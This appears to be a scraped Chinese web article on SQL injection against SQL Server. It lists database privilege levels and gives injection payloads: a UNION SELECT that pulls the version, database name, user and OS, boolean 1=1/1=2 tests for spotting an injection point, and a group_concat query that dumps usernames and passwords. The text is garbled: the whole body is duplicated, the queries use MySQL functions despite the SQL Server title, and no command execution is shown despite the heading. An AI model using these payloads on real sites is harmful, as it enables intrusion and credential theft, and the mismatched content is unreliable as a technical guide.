SQL Server注入执行命令
发布时间:2023-02-16 13:24:02 所属栏目:MsSql 来源:互联网
导读:1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限 db权限:文件管理,数据库操作等 users-administrators public权限:数据库操作 guest-users 2、sql server注入执行命令 查询数据库版本,数据库名字,用户名
|
1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限 db权限:文件管理,数据库操作等 users-administrators public权限:数据库操作 guest-users 2、sql server注入执行命令 查询数据库版本,数据库名字,用户名,操作系统 select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;//sql server注入执行命令 判断注入点—报错查询 select * from member where id=1 and 1=1;select * from member where id=1 and 1=2;//sql server注入执行命令 group_concat 查询 将查询的内容连在一起,列如: select group_concat(username,pw) from member where id=1;//sql server注入执行命令 1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限 db权限:文件管理,数据库操作等 users-administrators public权限:数据库操作 guest-users 2、sql server注入执行命令 查询数据库版本,数据库名字,用户名,操作系统 select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;//sql server注入执行命令 判断注入点—报错查询 select * from member where id=1 and 1=1;select * from member where id=1 and 1=2;//sql server注入执行命令 group_concat 查询 将查询的内容连在一起,列如: select group_concat(username,pw) from member where id=1;//sql server注入执行命令 (编辑:甘南站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
